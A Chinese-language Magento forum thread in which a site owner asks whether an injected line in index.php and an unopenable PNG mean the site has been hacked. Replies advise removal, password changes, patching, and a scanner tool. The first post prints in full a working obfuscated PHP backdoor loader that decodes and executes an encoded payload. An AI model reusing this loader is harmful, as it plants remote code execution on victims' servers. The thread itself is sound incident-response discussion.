# 是不是被别人种木马了？

**URL:** https://forum.magentochina.org/t/%E6%98%AF%E4%B8%8D%E6%98%AF%E8%A2%AB%E5%88%AB%E4%BA%BA%E7%A7%8D%E6%9C%A8%E9%A9%AC%E4%BA%86%EF%BC%9F/319
**Category:** 提问
**Tags:** 后端, magento1, 安全, 恶意代码
**Created:** [2018 年2 月 5 日 14:37 UTC](https://forum.magentochina.org/t/%E6%98%AF%E4%B8%8D%E6%98%AF%E8%A2%AB%E5%88%AB%E4%BA%BA%E7%A7%8D%E6%9C%A8%E9%A9%AC%E4%BA%86%EF%BC%9F/319 "2018-02-05T14:37:49Z")
**Posts on this page:** 7
**Page:** 1

<div class="post-metadata">

### 作者： ![dt16521](https://forum.magentochina.org/letter_avatar_proxy/v4/letter/d/82dd89/32.png) [@dt16521](https://forum.magentochina.org/u/dt16521)
#### 发布日期： [2018 年2 月 5 日 14:37 UTC](https://forum.magentochina.org/t/%E6%98%AF%E4%B8%8D%E6%98%AF%E8%A2%AB%E5%88%AB%E4%BA%BA%E7%A7%8D%E6%9C%A8%E9%A9%AC%E4%BA%86%EF%BC%9F/319/1 "2018-02-05T14:37:49Z")

</div>

请教一个问题：  
在网站的index.php文件里面多了一行代码：  
$swvJgN7=“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”;$xnDU7=“Fl1YmASDIlxhY/AX9mB3Ipa0mNtC9j411LNWnIdeERLMB”;$XYD8Jw="\x61";$UbK0prw="\x73\x74";$aIYkAW="\147\172\151";$iIhWWKU5="\142\x61\x73";$XYD8Jw.="\x73";$iIhWWKU5.="\x65\66\x34";$aIYkAW.="\156\x66";$xnDU7.=“5pT2FbcJngH5YzRzgfdrHFxM1pdJnsyS2zbhWxJrtHn2u”;$UbK0prw.="\162\137\x72";$UbK0prw.="\x6f\164";$iIhWWKU5.="\x5f\144\145\143";$xnDU7.=“cLD1x2uuMzMwPBgeLzIYhroKWTxHM+HDep5TvbzywABYN”;$aIYkAW.="\154\141";$XYD8Jw.="\163\145";$iIhWWKU5.="\157\x64\x65";$UbK0prw.="\61\x33";$xnDU7.=“j2TlLbXcceXnzgHZdlUxdvM6E2L7uTyPGtBYdzgLN”;$XYD8Jw.="\x72\164";$aIYkAW.="\x74\x65";@$XYD8Jw($aIYkAW($iIhWWKU5($UbK0prw($xnDU7))));

并且在skin/adminhtml/default/default/images/文件夹下出现nav2\_last\_li\_bg\_sm.png文件，这个文件下载下来后也是打不开的，显示图片打开错误。同时被服务商判定为有危害服务器的程序。请问这些是什么？是被别人装木马了吗？

---

<div class="post-metadata">

### 作者： ![Shuai](https://forum.magentochina.org/user_avatar/forum.magentochina.org/shuai/32/3_2.png) [@Shuai](https://forum.magentochina.org/u/Shuai)
#### 发布日期： [2018 年2 月 6 日 03:16 UTC](https://forum.magentochina.org/t/%E6%98%AF%E4%B8%8D%E6%98%AF%E8%A2%AB%E5%88%AB%E4%BA%BA%E7%A7%8D%E6%9C%A8%E9%A9%AC%E4%BA%86%EF%BC%9F/319/2 "2018-02-06T03:16:22Z")

</div>

目测确实中毒了，那个png文件，你可以以文本模式打开，估计也是php代码.

---

<div class="post-metadata">

### 作者： ![dt16521](https://forum.magentochina.org/letter_avatar_proxy/v4/letter/d/82dd89/32.png) [@dt16521](https://forum.magentochina.org/u/dt16521)
#### 发布日期： [2018 年2 月 6 日 03:25 UTC](https://forum.magentochina.org/t/%E6%98%AF%E4%B8%8D%E6%98%AF%E8%A2%AB%E5%88%AB%E4%BA%BA%E7%A7%8D%E6%9C%A8%E9%A9%AC%E4%BA%86%EF%BC%9F/319/3 "2018-02-06T03:25:37Z")

</div>

我现在怎么办？除了覆盖还有其他方法了吗？  
我在GitHub上看到有一个magento malware scanner，这个有用没？

---

<div class="post-metadata">

### 作者： ![Shuai](https://forum.magentochina.org/user_avatar/forum.magentochina.org/shuai/32/3_2.png) [@Shuai](https://forum.magentochina.org/u/Shuai)
#### 发布日期： [2018 年2 月 6 日 03:30 UTC](https://forum.magentochina.org/t/%E6%98%AF%E4%B8%8D%E6%98%AF%E8%A2%AB%E5%88%AB%E4%BA%BA%E7%A7%8D%E6%9C%A8%E9%A9%AC%E4%BA%86%EF%BC%9F/319/4 "2018-02-06T03:30:00Z")

</div>

有用没用不知道，首先你应该移除恶意代码，然后修改各种密码，再给自己的magento打补丁。然后再做其他的安全加固。

---

<div class="post-metadata">

### 作者： ![dt16521](https://forum.magentochina.org/letter_avatar_proxy/v4/letter/d/82dd89/32.png) [@dt16521](https://forum.magentochina.org/u/dt16521)
#### 发布日期： [2018 年2 月 6 日 03:36 UTC](https://forum.magentochina.org/t/%E6%98%AF%E4%B8%8D%E6%98%AF%E8%A2%AB%E5%88%AB%E4%BA%BA%E7%A7%8D%E6%9C%A8%E9%A9%AC%E4%BA%86%EF%BC%9F/319/5 "2018-02-06T03:36:45Z")

</div>

恶意代码我只在index.php里发现了一段，现在只是把它注释掉了，还没彻底删除。我现在用的是magento1.9的。

---

<div class="post-metadata">

### 作者： ![Shuai](https://forum.magentochina.org/user_avatar/forum.magentochina.org/shuai/32/3_2.png) [@Shuai](https://forum.magentochina.org/u/Shuai)
#### 发布日期： [2018 年2 月 6 日 03:40 UTC](https://forum.magentochina.org/t/%E6%98%AF%E4%B8%8D%E6%98%AF%E8%A2%AB%E5%88%AB%E4%BA%BA%E7%A7%8D%E6%9C%A8%E9%A9%AC%E4%BA%86%EF%BC%9F/319/6 "2018-02-06T03:40:40Z")

</div>

> [@dt16521](#):
>
> 恶意代码我只在index.php里发现了一段，现在只是把它注释掉了，还没彻底删除。我现在用的是magento1.9的。

1.9也需要补丁。你对比自己现在的版本号和最新的区别.

---

<div class="post-metadata">

### 作者： ![cainiao](https://forum.magentochina.org/user_avatar/forum.magentochina.org/cainiao/32/179_2.png) [@cainiao](https://forum.magentochina.org/u/cainiao)
#### 发布日期： [2026 年5 月 20 日 17:57 UTC](https://forum.magentochina.org/t/%E6%98%AF%E4%B8%8D%E6%98%AF%E8%A2%AB%E5%88%AB%E4%BA%BA%E7%A7%8D%E6%9C%A8%E9%A9%AC%E4%BA%86%EF%BC%9F/319/7 "2026-05-20T17:57:27Z")

</div>

我写了一个magento2 的恶意文件扫码程序， 可以试试：

> **[GitHub - shuaiZend/magescan: A high-performance, read-only security scanner for...](https://github.com/shuaiZend/magescan)**
>
> A high-performance, read-only security scanner for Magento 2 that detects web shells, payment skimmers, obfuscated malware, and database injections
